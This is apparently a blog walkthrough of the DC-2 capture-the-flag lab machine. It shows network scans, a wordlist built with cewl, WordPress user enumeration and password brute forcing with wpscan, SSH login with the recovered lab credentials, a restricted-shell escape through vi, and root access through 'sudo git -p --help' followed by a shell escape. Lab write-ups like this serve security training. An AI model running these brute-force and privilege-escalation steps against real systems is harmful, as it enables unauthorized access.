DC-2 ( Walkthrough )

A-s4t0sh
5 min readFeb 23, 2020

--

Starting with enumeration in order to get the IP of the machine using “netdiscover” scan.

netdiscover -i vboxnet1

Here I got the IP of the machine that is 192.168.57.106 so now I proceed with the IP to scan the services running on the machine using “nmap” scan.

nmap -v -sT -p- 192.168.57.106

Here I got two ports open that are 80 and 7744. So, I started a deep scan to get the details of the services running on the port with their versions.

nmap -v -A -sT -p- 192.168.57.106PORT     STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-generator: WordPress 4.7.10
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: DC-2 – Just another WordPress site
|_https-redirect: ERROR: Script execution failed (use -d to debug)
7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey:
| 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
| 2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
| 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_ 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
MAC Address: 08:00:27:05:C7:56 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.001 days (since Fri Feb 21 10:46:09 2020)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Here on port no. 80 Apache server is up and on port no. 7744 the “ssh” service is running. Here I take a look on web what is running their or if I got any information their.

Browsing the url “ http://192.168.57.106”

Here I got flag link which the first flag, moving to that,

After reading the flag I moved to the terminal to get the words that are present on the website and make a file named pass.txt using “cewl”

cewl http://dc-2 > pass.txt

Now using “wpscan” tool to enumerate the names of WordPress users.

wpscan --url dc-2 -e u

Here I got the user names now with these user I again user “wpscan” tool to get the password to log in to WordPress.

wpscan -U admin,jerry,tom --url dc-2 -P pass.txt

Username: jerry, Password: adipiscing

Username: tom, Password: parturient

Using the above mentioned credentials I tried to log in to ssh service, but here I am not able to get logged in with the user “jerry” then I tried with “tom” nad here I get logged in.

ssh tom@192.168.57.106 -p 7744

After logging in I got two files.

Here I check the commands that we can run with the user “Tom”.

tom@DC-2:~$ ls -la usr/bin

Here user Tom have the permission to use “vi” command to get the bash shell commands using “vi”.

tom@DC-2:~$ vi
> :set shell=/bin/bash
> :shell

After setting the shell as /bin/bash I exported the shell

tom@DC-2:~$ export PATH=/bin:/usr/bin/

Here we get the bash shell, that's cool now I can read the flag3.txt file.

tom@DC-2:~$ cat flag3.txt

Here I switched to user “jerry” as to get another flag.

tom@DC-2:~$ su jerry

Username: jerry, Password: adipiscing

I used to check the root user command if I can run with a normal user.

jerry@DC-2:/home/tom$ sudo -l

Got that, the user can run the “git” command as root user.

Before proceeding I check if any flag is available their or not. And I got the flag4.txt named file.

cat flag4.txt 

As the flag says I have to use “git” command here to proceed forward after minimizing the terminal.

jerry@DC-2:~$ sudo git -p --help
> !/bin/bash

Well here I got the shell.

root@DC-2:/home/jerry# id
root@DC-2:/home/jerry# cd | ls
root@DC-2:~# cat final-flag.txt

Here we go, good to see the final flag of the machine. Enjoyed the CTF and came to know about interesting tools.

--

--

No responses yet